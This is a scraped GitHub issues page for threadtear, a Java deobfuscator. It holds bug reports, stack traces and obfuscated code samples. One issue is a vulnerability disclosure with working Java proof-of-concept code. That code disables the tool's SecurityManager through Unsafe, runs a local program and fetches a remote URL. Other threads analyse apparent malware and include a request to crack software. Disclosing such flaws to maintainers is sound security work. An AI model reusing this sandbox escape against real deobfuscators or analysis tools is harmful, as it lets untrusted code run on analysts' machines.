graxcode / threadtear Goto Github PK
View Code? Open in Web Editor NEWMultifunctional java deobfuscation tool suite
License: GNU General Public License v3.0
Multifunctional java deobfuscation tool suite
License: GNU General Public License v3.0
What do you think?
https://www.strawpoll.me/20029041
Multiple decompilers will increase file size.
I am using Threadtear to deobfuscate some annoying Java code. There are around 2,700 class files (all encrypted with random ass names like _ab2) Most of them look the same as in the screenshot. I am 65% sure that this is ZKM but honestly i'm not sure since I primarily deobf C# and .NET files. Any help is greatly appreciated!
*These three screenshots are from ONE file. The others look the same but are sometimes alot longer or alot shorter.
.
how do you add external libs, am i an idiot and just don't see it?
Describe what's not working
Can not open jar because svg failed to load.
Log / Screenshots
Exception in thread "main" java.lang.RuntimeException: Exception while painting 'jar:file:/Users/lz233/Documents/xxx/threadtear-gui-3.0.1-all.jar!/me/nov/threadtear/threadtear.svg'.
at com.github.weisj.darklaf.icons.DarkSVGIcon.createImage(DarkSVGIcon.java:177)
at com.github.weisj.darklaf.icons.ImageSource.createImage(ImageSource.java:31)
at com.github.weisj.darklaf.icons.IconUtil.createScaledImage(IconUtil.java:95)
at com.github.weisj.darklaf.icons.IconUtil.iconToImage(IconUtil.java:87)
at com.github.weisj.darklaf.icons.IconUtil.createScaledFrameIcon(IconUtil.java:75)
at com.github.weisj.darklaf.icons.IconUtil.createFrameIcon(IconUtil.java:61)
at com.github.weisj.darklaf.icons.IconLoader.createFrameIcon(IconLoader.java:383)
at me.nov.threadtear.swing.SwingUtils.iconToFrameImage(SwingUtils.java:172)
at me.nov.threadtear.Threadtear.<init>(Threadtear.java:36)
at me.nov.threadtear.Threadtear.getInstance(Threadtear.java:44)
at me.nov.threadtear.Threadtear.main(Threadtear.java:54)
Caused by: java.lang.RuntimeException: com.kitfox.svg.SVGException: java.lang.IllegalArgumentException: User must specify at least 2 colors
at com.kitfox.svg.app.beans.SVGIcon.paintIcon(SVGIcon.java:326)
at com.kitfox.svg.app.beans.SVGIcon.paintIcon(SVGIcon.java:213)
at com.kitfox.svg.app.beans.SVGIcon.getImage(SVGIcon.java:113)
at com.github.weisj.darklaf.icons.DarkSVGIcon.createImage(DarkSVGIcon.java:165)
... 10 more
Caused by: com.kitfox.svg.SVGException: java.lang.IllegalArgumentException: User must specify at least 2 colors
at com.kitfox.svg.ShapeElement.renderShape(ShapeElement.java:169)
at com.kitfox.svg.Path.render(Path.java:94)
at com.kitfox.svg.Group.render(Group.java:205)
at com.kitfox.svg.Group.render(Group.java:205)
at com.kitfox.svg.SVGRoot.render(SVGRoot.java:335)
at com.kitfox.svg.SVGRoot.renderToViewport(SVGRoot.java:266)
at com.kitfox.svg.SVGDiagram.render(SVGDiagram.java:111)
at com.kitfox.svg.app.beans.SVGIcon.paintIcon(SVGIcon.java:322)
... 13 more
Caused by: java.lang.IllegalArgumentException: User must specify at least 2 colors
at java.desktop/java.awt.MultipleGradientPaint.<init>(MultipleGradientPaint.java:169)
at java.desktop/java.awt.LinearGradientPaint.<init>(LinearGradientPaint.java:285)
at com.kitfox.svg.LinearGradient.getPaint(LinearGradient.java:157)
at com.kitfox.svg.ShapeElement.renderShape(ShapeElement.java:167)
... 20 more
Please complete the following information:
I tried to drag a binsecure obfuscated jar into it but it just displayed errors.
are there any patch work with binsecure?
title says all ^^
Describe what's not working
Running the ZKM deobfuscation tool, specifically "Flow obfuscation removal (ZKM)" results in a null pointer exception.
Java archive
Link to archive: https://easyupload.io/dbiftd
Log / Screenshots
Exception in thread "Execution-Thread" java.lang.NullPointerException
at me.nov.threadtear.execution.zkm.FlowObfuscationZKM.removeZKMJumps(FlowObfuscationZKM.java:39)
at java.util.ArrayList.forEach(Unknown Source)
at me.nov.threadtear.execution.zkm.FlowObfuscationZKM.lambda$execute$2(FlowObfuscationZKM.java:32)
at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(Unknown Source)
at java.util.stream.ReferencePipeline$3$1.accept(Unknown Source)
at java.util.HashMap$ValueSpliterator.forEachRemaining(Unknown Source)
at java.util.stream.AbstractPipeline.copyInto(Unknown Source)
at java.util.stream.AbstractPipeline.wrapAndCopyInto(Unknown Source)
at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(Unknown Source)
at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(Unknown Source)
at java.util.stream.AbstractPipeline.evaluate(Unknown Source)
at java.util.stream.ReferencePipeline.forEach(Unknown Source)
at me.nov.threadtear.execution.zkm.FlowObfuscationZKM.execute(FlowObfuscationZKM.java:32)
at me.nov.threadtear.ThreadtearCore.lambda$run$5(ThreadtearCore.java:62)
at java.util.ArrayList.forEach(Unknown Source)
at me.nov.threadtear.ThreadtearCore.run(ThreadtearCore.java:59)
at me.nov.threadtear.Threadtear.lambda$run$5(Threadtear.java:157)
at java.lang.Thread.run(Unknown Source)
Please complete the following information:
Running on latest JDK, 14.
I've tried using -cp
but haven't had much luck - when deobfuscating jars that require multiple jars (otherwise you'll get ClassNotFoundError
when running threadtear), how can you specify those extra jars to be part of the classpath?
I've had to combine all files into one jar file so far as a workaround.
Hello! What about the functionality of adding libraries during deobfuscation?
Describe what's not working
The Stringer access deobfuscation code doesn't work properly because of class proxy collisions. I added some debug prints below to find the problem.
As you can see fuck_the_regulations_v320/dC
and fuck_the_regulations_v320/cb
has the same hashCode()
Here's the offending line in the executor:
ClassNode proxy = Sandbox.createClassProxy(String.valueOf(cn.name.hashCode())); // can't use real
// class name here
Java archive
The java archive I'm trying to deobfuscate is malware hiding as a crack for Jetbrains products.
I don't want to attach it, but the sample is: SHA256: e3055d5b636b39d5609b8cfa28da2d8955615985fad53a5c27baac51cadbc698 name: jetbrains-agent.jar
Log / Screenshots
20:32:29.312 ERROR: !!! fuck_the_regulations_v320/dC cn.name.hashCode(): -1516023385
20:32:29.312 WARN : cn.name: fuck_the_regulations_v320/dC
20:32:29.312 ERROR: !!! fuck_the_regulations_v320/cb cn.name.hashCode(): -1516023385
20:32:29.312 ERROR: Failed load proxy for fuck_the_regulations_v320.cb, java.lang.RuntimeException: class -1516023385 is already defined
Please complete the following information:
I try to decompile this class, but I get ERROR: Failed to load class (java.lang.ArrayIndexOutOfBoundsException: 64218)
Class: https://www.upload.ee/files/12345161/hS.class.html
Hello i have been trying to deobfuscate one jar file.
its mixed and i got everything from it except strings which are pretty important for me
so it says:
Of a total 274 encrypted strings, 0.0% were successfully decrypted
So it knows they are encrypted, and they look like allatori.
Above that it spams this:
Failed to decrypt string in Class329._congo()V: java.lang.reflect.InvocationTargetException, nul
its always the same bug, only other class.
Hello, I'm trying to deobfuscate a .jar file that contains encrypted method calls and strings but I couldn't find the correct executions.
I tried almost all of the execution options(not all of them at the same time), but still i can't get what i expect. (Maybe i am expecting more than this program does, anyway there is a huge of effort to build this)
Can someone help me to find the correct executions list?
Here is the stringdecryptor class:
This basically does Exclusive OR (XOR) between decrypted string and given key to convert string char by char.
public class stringdecryptor {
public static String Decrypt(String var0, int var1) {
var var5 = var0 + var1;
char[] chararray = var0.toCharArray();
StringBuilder builder = new StringBuilder();
int counter = 0;
while(counter < chararray.length) {
builder.append((char)(chararray[counter] ^ var1));
++counter;
}
var var4_6 = builder.toString();
return var4_6;
}
}
I changed some of the method names(and class name too) to make it human readable. In original version, it contains HashMap functions to store already decrypted strings and return back.
Here is the MethodCallerClass thing that idk how to name it, i rewrited some of the variable names and i parsed it
The creation of variables and arrays to work with: https://i.hizliresim.com/Isl2z2.png
The while loops that does XOR with specified keys: https://i.hizliresim.com/D1O4kn.png (char by char)
The actual caller thing (ConstantCallSite, MethodHandles, etc.): https://i.hizliresim.com/jZxz0j.png
Here are examples of how these things works:
stringdecryptor.Decrypt("\u3837\u3832\u3839\u3829\u383a\u3829\u3832\u383e\u3828", -214419365);
is equivalent to: libraries
MethodCaller class behaves strange, just look at arguments
sdeg$wxOw.lOkD("\u2007\u2009\u2006\u200a", 0, "\u0474\u0466\u0457\u0446", "\u0784\u0793\u079b\u0799\u0780\u0793\u07b0\u0799\u079a\u0792\u0793\u0784", "\u07a0\u07c4\u07e2\u07e9\u07fe\u07e9\u07a7\u07e1\u07e7\u07a7\u07ce\u07e1\u07e4\u07ed\u07b3\u07a1\u07de", randomPath);
is equivalent to: qcRC.removeFolder(randomPath);
because of 0 means it's a static method and there is one argument after "method caller class's own arguments"
sdeg$wxOw.lOkD("\u2008\u200c\u200a\u200d", 1, "\u046f\u0464\u0473\u0464\u042b\u046c\u046a\u042b\u0443\u046c\u0469\u0460", "\u0782\u0799\u07a3\u07a4\u07bf", "\u07a0\u07a1\u07c4\u07e2\u07e9\u07fe\u07e9\u07a7\u07e6\u07ed\u07fc\u07a7\u07dd\u07da\u07c1\u07b3", file);
is equivalent to: file.toURI()
because of 1 means it's a virtual method and there is no arguments given after the file
object
There is a few little encryption-decryption methods for specific things in the jar file but they are not much important as this ones and they are easy to solve. (I think they are written by hand)
If there is a execution that deobfuscates this type of jar files?
Btw, if the photo links gone, tell me, i will reupload them
Describe what's not working
An IllegalArgumentException is thrown when loading any jar file.
Java archive
Not jar-speficic.
Log / Screenshots
https://pastebin.com/unFzRRAV
Please complete the following information:
Describe what's not working
Hi this is a request for Proguard Deobfuscation as the current included methods do not work.
Example snippit:
int[] var10002;
switch(163<invokedynamic>()[lllllIlllIIllIl.54<invokedynamic>(lllllIlllIIllIl).164<invokedynamic>(lllllIlllIIllIl.54<invokedynamic>(lllllIlllIIllIl)).165<invokedynamic>(lllllIlllIIllIl.54<invokedynamic>(lllllIlllIIllIl).164<invokedynamic>(lllllIlllIIllIl.54<invokedynamic>(lllllIlllIIllIl)))]) {
case 1:
var10001 = lllllIlllIIllIl.73<invokedynamic>(lllllIlllIIllIl);
var10002 = new int[llIII[3]];
var10002[llIII[0]] = llIII[127];
lllllIlllIIllIl.167<invokedynamic>(lllllIlllIIllIl, var10001.166<invokedynamic>(var10001, var10002));
"".length();
if (-" ".length() >= " ".length() << " ".length()) {
return (boolean)((143 ^ 194 ^ (191 ^ 160) << (" ".length() << " ".length())) << " ".length() & (((37 ^ 118) << " ".length() ^ 148 + 0 - 57 + 60) << " ".length() ^ -" ".length()));
}
break;
case 2:
var10001 = lllllIlllIIllIl.73<invokedynamic>(lllllIlllIIllIl);
var10002 = new int[llIII[3]];
var10002[llIII[0]] = llIII[128];
lllllIlllIIllIl.167<invokedynamic>(lllllIlllIIllIl, var10001.166<invokedynamic>(var10001, var10002));
"".length();
if (" ".length() << (" ".length() << " ".length()) < " ".length() << " ".length()) {
return (boolean)((115 + 107 - 217 + 186 ^ (211 ^ 142) << " ".length()) << " ".length() & (((18 ^ 11) << (" ".length() << " ".length()) ^ 112 ^ 17) << " ".length() ^ -" ".length()));
}
break;
case 3:
var10001 = lllllIlllIIllIl.73<invokedynamic>(lllllIlllIIllIl);
var10002 = new int[llIII[3]];
var10002[llIII[0]] = llIII[129];
lllllIlllIIllIl.167<invokedynamic>(lllllIlllIIllIl, var10001.166<invokedynamic>(var10001, var10002));
"".length();
if ((" ".length() << (" ".length() << " ".length()) & ~(" ".length() << (" ".length() << " ".length()))) > 0) {
return (boolean)(" ".length() << (" ".length() << " ".length()) & ~(" ".length() << (" ".length() << " ".length())));
}
or
private static void lllIll() {
llIII = new int[570];
llIII[0] = (187 ^ 152) & ~(46 ^ 13);
llIII[1] = " ".length() << (" ".length() << " ".length());
llIII[2] = ((75 ^ 110) << " ".length()) + (164 + 152 - 192 + 189 << " ".length()) - (499 + 440 - 628 + 268) + ((118 ^ 1) << (" ".length() << " ".length())) << (13 ^ 126 ^ (137 ^ 178) << " ".length());
llIII[3] = " ".length();
llIII[4] = (86 + 49 - 125 + 125 << (" ".length() << " ".length())) + (166 + 17 - 169 + 239 << (" ".length() << " ".length())) - (221 + 39 - 256 + 351 << (" ".length() << " ".length())) + 592 + 342 - -327 + 244 << (" ".length() << (" ".length() << " ".length()));
llIII[5] = " ".length() << " ".length();
llIII[6] = 19636 + 350 - 17373 + 23578;
llIII[7] = " ".length();
llIII[8] = (380 + 673 - 553 + 257 << (" ".length() << (" ".length() << " ".length()))) + (559 + 346 - -40 + 174 << (" ".length() << " ".length())) - (7840 + 4003 - 6684 + 4724) + (1252 + 754 - 681 + 1870 << " ".length()) << " ".length();
llIII[9] = " ".length() << (" ".length() << " ".length());
llIII[10] = (2994 + 2911 - 3415 + 3355 << (" ".length() << " ".length())) + 2033 + 13 - 758 + 11901 - (10057 + 29018 - 8500 + 5746) + 2286 + 1478 - -16609 + 5568;
llIII[11] = 102 ^ 99;
llIII[12] = 665 + 189 - 369 + 648 + 502 + 555 - 415 + 51 - -(772 + 606 - 76 + 119) + (300 + 90 - -227 + 208 << (" ".length() << " ".length())) << (" ".length() << " ".length());
llIII[13] = " ".length() << " ".length();
llIII[14] = (2466 + 1873 - 2544 + 1248 << (" ".length() << " ".length())) + 1087 + 919 - 1149 + 752 - -(29 + 364 - 308 + 348) + 6612 + 6087 - 10152 + 9426;
llIII[15] = 130 ^ 133;
Java archive
The jar archive that is not deobfuscated successfully. (Make sure you have the rights for it!)
Here are files you can use for reference.
I may be biased, but I find Always on Top to be causing a lot of problems and no real benefits. Least of all, when debugging and execution is paused, the window will become unresponsive and it is impossible to use that screen space or put anything on top of it. Also during normal usage, it makes me have to get out of my way to use the screen space that it covers. Could you please disable Always on Top? Or if not, make it an optional feature in the Look and Feel settings.
It's a malicious file..results just show run was finished and nothing else.
https://app.any.run/tasks/49e499f0-f924-47ee-8bac-2695c3a24c15/
Saw your warning @ https://github.com/GraxCode/threadtear#warning and thought it would be cool if people could see what an example of a successful arbitrary code execution would look like on threadtear as well as how the deobfuscator's instances are exposed to the program.
The PoC below specifically is targeted against Allatori's transformer; however, it can easily be adapted to fool threadreaper into executing it in any of the other transformers which utilize the VM.
package me.itzsomebody.poc;
import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
public class PoC {
public static void bogus() {
System.out.println(malicious("lol"));
}
public static String malicious(String bogus) {
try {
for (StackTraceElement element : Thread.currentThread().getStackTrace()) {
if (element.getClassName().startsWith("me.nov")) {
System.out.println("Found exposed threadtear deobfuscator instance: " + element.toString());
}
}
} catch (Throwable t) {
}
try {
Field f = Unsafe.class.getDeclaredField("theUnsafe"); // from http://weblog.ikvm.net/2011/08/01/HowToDisableTheJavaSecurityManager.aspx
f.setAccessible(true);
Unsafe unsafe = (Unsafe) f.get(null);
Method staticFieldBase = Unsafe.class.getDeclaredMethod("staticFieldBase", Class.class);
Object systemBase = staticFieldBase.invoke(unsafe, System.class);
Method getObject = Unsafe.class.getDeclaredMethod("getObjectVolatile", Object.class, long.class);
Method putObject = Unsafe.class.getDeclaredMethod("putObjectVolatile", Object.class, long.class, Object.class);
for (int i = 0; ; i += 4) {
if (getObject.invoke(unsafe, systemBase, i) == System.getSecurityManager()) {
putObject.invoke(unsafe, systemBase, i, null);
System.out.println("Disabled threadtear's SecurityManager");
break;
}
}
Runtime.getRuntime().exec("notepad.exe");
System.out.println("Successful command line execution");
java.net.URLConnection connection = new java.net.URL("https://gist.githubusercontent.com/ItzSomebody/ac48f790620dace21ab2654bac155107/raw/4e6bea306e5c42a8ff58b39b76f91884931e8b4b/keybase.md").openConnection();
connection.setConnectTimeout(8000);
connection.setReadTimeout(8000);
java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(connection.getInputStream()));
String s;
while ((s = reader.readLine()) != null) {
System.out.println(s);
}
System.out.println("Successful arbitrary code execution");
} catch (Throwable t) {
// Oops, we failed to disable the SM
// Gotta exit otherwise SuSpiCiOuS
}
return "TT ACE proof-of-concept";
}
}
The radon string obfuscation works with cipher and some random chinese letters x3
Here one obfuscated jar: https://workupload.com/file/H5AnKeDx6yg
idk if this the right format of Issue but ill try
Could you add Compatbility to Binscure Obfuscator
heres the website link https://binclub.dev/binscure/
Describe what's not working
Ich habe in den "Look and feel settings" das Theme auf IntelliJ gesetzt und dies hat scheinbar das gesamte Design zerhauen.
Das Design erscheint mir simpel unvollständig / nicht fertig.
Java archive
I don't get this one, sorry
Please complete the following information:
Additional context
Can you provide lib or pom.xml?
Tremendous ZipEntry
https://anonymousfiles.io/HZoHJcm8/
Version 1.3
1.zip
Thread tear doesn't work because of the darlaf last update. Please help.
Screenshoot: https://cdn.discordapp.com/attachments/755699147381800991/755757888751927306/unknown.png
Discord: Cryfix#1818
Describe what's not working
The jar is obfuscated by ZKM (unknown version) and has string encryption + reference obfuscation applied. Only the calls to the string decryption method are encrypted. The tool is unable to deobfuscate it.
Java archive
v4_dumpfile.zip
Log / Screenshots
https://hasteb.in/xipijatu.kotlin
Please complete the following information:
For autostyle to work an eclipseformat configuration should be supplied.
If done the following line should be replaced.
Line 12 in 800f79a
Change to
val skipAutostyle by props()
Occurs in:
threadtear/src/me/nov/threadtear/util/format/OpFormat.java
Lines 15 to 24 in cef8067
Example:
map.put(ICONST_0, "ICONST_0");
...
map.put(H_PUTFIELD, "H_PUTFIELD");
Yes, totally different opcodes, but they all have an int value of 3
, so the last assignment overwrites the previous ones.
Can you tell me what is this protected with?
And if it is not difficult, will you crack it?
Discord: exotic.# 0001
If you crack software, contact me from discord. I would like to give a gift.
So since you don't give an already compiled version in your Release section, I downloaded the project and compiled it myself.
I'm not familiar with Gradle so I may be doing something wrong, first, I setted up the gradlew environment and then compiled the whole thing for a jar file:
gradlew build
then
gradlew jar
C:\Users\xxxx\Desktop\threadtear-master>gradlew jar
BUILD SUCCESSFUL in 1s
1 actionable task: 1 executed
C:\Users\xxxx\Desktop\threadtear-master>cd build\libs\
C:\Users\xxxx\Desktop\threadtear-master\build\libs>java -jar threadtear.jar
no main manifest attribute, in threadtear.jar
The reason is it can't find the main method, I tried applying it myself with
java -cp threadtear.jar me.nov.threadtear
and even with that, the error is
Error: Could not find or load main class me.nov.threadtear
Despite I manually checked and it does contain the main method in there:
public static void main(String[] args) throws Exception {
What am I doing wrong? :)
Currently the fatJar
task simply copies the content of each dependency into the jar. This results in files that have the same name to be overwritten.
Because most licenses are located at (and called) META-INF/LICENSE
only one of those will survive (which isn't event deterministic.
I see two possible solutions here.
Switch to a plugin which handles the creation of the fat jar e.g. shadow and configure it to copy the contents of the META-INF
folder of each jar to META-INF/<dependency-name>
.
Switch from java-library
to the
applicationplugin. The
application` plugin creates a distribution zip which contains all jar files and a startup script.
plugins {
id 'application'
}
application {
mainClassName = 'me.nov.threadtear.Threadtear'
applicationName = 'Threadtear'
}
The resulting zip has the following structure.
Threadtear-2.7.0/
├── bin/ // This is also the working directory for the application.
│ ├── Threadtear
│ └── Threadtear.bat
└── lib/
├── ...
└── all dependencies
When you save the jar file it basically downloads the original file you inserted and it is not deobfuscated at all, while in the editor it is all nicely deobfuscated
Describe what's not working
Can't build the app when I cloned it
Command: gradle fatJar
Log / Screenshots
https://hasteb.in/josofoko.gradle
Please complete the following information:
If you know an obfuscator that has no execution class yet, or have an idea what could be useful for deobfuscation and analysis, make your own execution! Just extend me.nov.threadtear.execution.Execution, do your action, and open a pull request or send it to me on discord: noverify#7184
Only the try-catch blocks removing seems to be working.
JAR : https://gofile.io/d/cnIUtw
Logger: https://throwbin.io/STvWWSt
Hi guys, I thought I should open an issue for that:
There are so many unused declarations in your project, be it methods, unused imports, global fields etc.
Is this done on purpose / am I missing something? Or is this "unused" code being loaded at Runtime indirectly (maybe with reflection?)
Any reply is appreciated, thanks.
Maby add smoke support?
Here a two files: https://workupload.com/archive/cZAa2Z3F
The second with 2 in the name is deobfuscated with yours, but the classes are not clear.
Hey there! Just wondering if there are any plans on working on the DES Cipher deobf more?
I have a lot of jar files that use ZKM and I'd like to know if it is possible at all (even without threadtear) or if its
even possible full stop
Thanks
I was trying to load a jar into ThreadTear, when I came across this error numerous amount of times across multiple jar files.
Failed to load class (java.lang.ArrayIndexOutOfBoundsException: 65448)` java.lang.ArrayIndexOutOfBoundsException: 65528 at org.objectweb.asm.ClassReader.readStringish(ClassReader.java:3691) at org.objectweb.asm.ClassReader.readClass(ClassReader.java:3706) at org.objectweb.asm.ClassReader.accept(ClassReader.java:486) at org.objectweb.asm.ClassReader.accept(ClassReader.java:394) at me.nov.threadtear.io.Conversion.toNode(Conversion.java:38) at me.nov.threadtear.io.JarIO.readEntry(JarIO.java:34) at me.nov.threadtear.io.JarIO.lambda$loadClasses$0(JarIO.java:23) at java.util.Iterator.forEachRemaining(Unknown Source) at java.util.Spliterators$IteratorSpliterator.forEachRemaining(Unknown Source) at java.util.stream.ReferencePipeline$Head.forEach(Unknown Source) at me.nov.threadtear.io.JarIO.loadClasses(JarIO.java:23) at me.nov.threadtear.swing.tree.ClassTreePanel.loadFile(ClassTreePanel.java:213) at me.nov.threadtear.swing.tree.ClassTreePanel.lambda$onFileDrop$8(ClassTreePanel.java:194) at me.nov.threadtear.swing.panel.StatusBar$2.doInBackground(StatusBar.java:103) at me.nov.threadtear.swing.panel.StatusBar$2.doInBackground(StatusBar.java:100) at javax.swing.SwingWorker$1.call(Unknown Source) at java.util.concurrent.FutureTask.run(Unknown Source) at javax.swing.SwingWorker.run(Unknown Source) at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.lang.Thread.run(Unknown Source) Failed to load class (java.lang.ArrayIndexOutOfBoundsException: 65528)
Some recommendations for improving the UI.
GridLayout
. It ignores their preferred size and makes them too large. Consider using a Box
with glues and spacers for positioning or wrap each button inside a JPanel
with GridBagLayout
and null
constraints.Some points regarding darklaf
2.0.2
ThemeSettings
class to achieve this without much work..svg
format (available on the IntelliJ community repo) and load them using IconLoad#loadIcon
.
darklaf-property-loader
for this.darklaf
is to use ThemedSVGIcon
with the provided properties. (If you want I can help converting the icons to the correct format).Hi, Does ZKM work for 14.0.5? I really need.
can't deobuscate jar file. Obfuscation is similar to zkm.
jar file: https://workupload.com/file/bFVafRnQCEd
Hello.
A new JEP was recently submitted to the security-dev
mailing list proposing the depreciation of the Security Manager (for removal): https://openjdk.java.net/jeps/411.
I think that going forward the combination of lack of support for the Security Manager in the openjdk, as well as the lack of security it actually offers, make it unsuitable for continued use sandboxing code execution in threadtear.
There are some alternatives that should be considered:
Describe what's not working
If increase Font size,
"Add Execution List" no Item selectable
Please complete the following information:
Stumbled across a jar file with this string obfuscation (static initializer code):
byte var10000 = 15;
var10000 = 14;
boolean var7 = true;
int var0 = -1716149230;
var0 &= 1576531202;
byte[] var8 = Base64.getDecoder().decode("4AAAAB4gAAAAAAAePiAAAADiwuAeIOL+Pj4gHiAA4sLCwuAAHiAAHiDi4ALciJxYNILa+mACbJzs9ihGYBoAJBYEoGAaQP6cWKDkHlp4jlyYKF7q8KRownBeEmK4QAioekxids6WIBSg8lB2GoS4Dp6KjBo2AGB4UobM+gACaMJsTgIEuEAIqHpi7l6OsoDsXPikRmaaGAx+XDzy7ABoIBgomv72KEZUfqIg9KAA5lxKhAakGLq+ogJqYkjGWPAgAKwu6mjCcmzw+AAQFOZ2uBqOXuSaWuj4UCLy+pZk8PACAHb2ZhIUFAoKmu7s7AKeUGJUTJgeru7CaPDQaAACSlbK/r72RCLyEvxOou5cZhxQ1rCiagL2wsQYNoJadihY5nb+gniQ8vAEjHikJJ4U/ORq6FSIeDhq/oB8KkbsBIhUYAiaeBqqAgLOlu7uFhiSYPz4XpgSrJx2LmyW+mDsQgAS6viwvHiMGKwGXORq6FSIeDhq/oB8KkbsBIhUYAiaYAaonnQatJpkeqhK6M6W7u4WGJJg/PhemBKsnHYubJb6ZB6g/vwA/ORq6FSIeDhqGsJ2JvBIxL4GBFakJIhiFrwCBADkMGAMsgAOppie2kaqFm5O5GoAXGIQOmiGYIwMBopIoG5kwBgiAJKcKkKoCAyE2MIA/ARg+FrykDAaMgBc2mSG1uwYktR8OLqgomoC7sAAECDqYOQwYAyyFuAQqALo3Hy4iN4YEljoXooAFu5oxpwChnQcPNxKZJBk2iSynGyGnopgYO7e7HSYGrq8YOxq5lwGmnakuozqQnr8ShIIXooAFu5o2DJg5nQcKkbsBJBk2sQYnPp2KFjmdv58dKBapvqsiFCY6Bjmdv5mFgKu8Bpi7v78TO5KcgZwrPrc6vrmGP6QAgqcUhqi/OJyOFyQGqoGYAJ2hk7uBIhYcCAKFKQQcoLsmnaUfOCqTmKiHihc9ihOYtwYwvxcmp7+SNhC5lr6BKBaeDwI/EgGpAiI6KBu9mQc0KQm8vz0YA4KhvpSAmx4GOIUinzodiYEAl4YitzqXid996OTlXo=");
int var10001 = var8.length;
byte[] var3;
int var5;
int var10002;
if(var8.length != 0) {
int var4 = var10001;
var3 = new byte[var10001];
var5 = var10001;
do {
var0 &= 536202998;
var5 += -1;
byte var9 = var8[var5];
if(var5 + 6 + -var4 >= 0) {
var10002 = var0 & '\u8000';
var0 &= -646058490;
var10001 = var9 + 6;
} else {
var10001 = var9 + var3[var5 + 6];
}
var10002 = var0 & 1024;
var0 &= 502635791;
var3[var5] = (byte)var10001;
} while(var5 != 0);
var8 = var3;
var10001 = -6929 & 6928;
}
var10002 = var0 & 128;
var10002 = var0 & 262144;
var0 &= -46297094;
byte[] var2 = var8;
var10001 = var8.length + -1;
if(var8.length + -1 != 0) {
var3 = new byte[var10001];
var5 = var10001;
while(true) {
var0 &= -1078080002;
var5 += -1;
var3[var5] = (byte)((var8[var5] << 3) + (var2[var5 + (20528 ^ 20529)] >> 5 & (20486 ^ 20481)));
if(var5 == 0) {
var8 = var3;
var10001 = 13638 & -16247;
break;
}
}
}
var10002 = var0 & 8;
var10002 = var0 & 8;
var0 &= -616704874;
var10001 = var8.length;
if(var8.length != 0) {
var3 = new byte[var10001];
var5 = var10001;
while(true) {
var0 &= -574763918;
var5 += -1;
var3[var5] = (byte)(((var8[var5] ^ 25) << (1316 & 204) & -16 | (var8[var5] ^ 25) >> (262 & 3620) & 15) + 18);
if(var5 == 0) {
var8 = var3;
var10001 = -9181 & 8924;
break;
}
}
}
var10002 = var0 & 2;
var10002 = var0 & '\u8000';
var0 &= 503307910;
var3 = var8;
String var6 = new String(var3, StandardCharsets.UTF_8);
String[] var10 = new String[2384 ^ 2380];
String[] var11 = new String[4363 ^ 4375];
var11[18435 ^ 18436] = var6.substring(17994 & -18283, 4167 & 2063);
var11[280 & 6348] = var6.substring(4201 ^ 4206, 93 ^ 83);
var11[-31470 ^ -31461] = var6.substring(-27583 ^ -27569, 1584 ^ 1573);
var11[-32219 ^ -32209] = var6.substring(4117 & 18581, 14396 & 1118);
var11[24637 & 2893] = var6.substring(30524 & 221, 80 ^ 115);
var11[-30713 ^ -30708] = var6.substring(11 ^ 40, 2628 ^ 2670);
var11[16423 ^ 16427] = var6.substring(1043 ^ 1081, 17841 & 12337);
var11[16768 ^ 16791] = var6.substring(396 ^ 445, 4174 & 106);
var11[20274 & 155] = var6.substring(4680 ^ 4610, 4161 ^ 4150);
var11[4441 & 17469] = var6.substring(10538 ^ 10589, 6654 & 159);
var11[3101 & 12437] = var6.substring(8638 & 20638, 4164 ^ 4262);
var11[245 & 8705] = var6.substring(21479 & 2290, 4351 & 18926);
var11[2305 ^ 2307] = var6.substring(8513 ^ 8623, 17444 ^ 17628);
var11[29709 & 2085] = var6.substring(19704 & 12536, 318 & 6027);
var11[2326 ^ 2317] = var6.substring(16698 & 14158, 433 & 21816);
var11[4111 & 18399] = var6.substring(16429 ^ 16669, 4477 & 1004);
var11[8229 ^ 8245] = var6.substring(321 ^ 45, 4496 ^ 4152);
var11[-32109 ^ -32126] = var6.substring(-31616 ^ -31448, 8307 ^ 8615);
var11[1310 & 4187] = var6.substring(17742 ^ 17562, 1260 ^ 1773);
var11[1135 ^ 1145] = var6.substring(-32533 ^ -32022, 6339 ^ 6881);
var11[1046 & 18694] = var6.substring(554 & 695, 3202 ^ 3752);
var11[678 ^ 690] = var6.substring(6403 ^ 6953, 624 & 6755);
var11[556 ^ 575] = var6.substring(4187 ^ 4667, 444 ^ 826);
var11[1052 ^ 1048] = var6.substring(-27880 ^ -28258, 93 ^ 719);
var11[835 & 16423] = var6.substring(2710 & 979, -24153 ^ -23803);
var11[16398 & 10782] = var6.substring(2234 ^ 2584, -32250 ^ -32563);
var11[278 ^ 270] = var6.substring(4811 & 763, 6911 & 767);
var11[-2782 & 2265] = var6.substring(767 & 1791, 29212 ^ 28928);
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.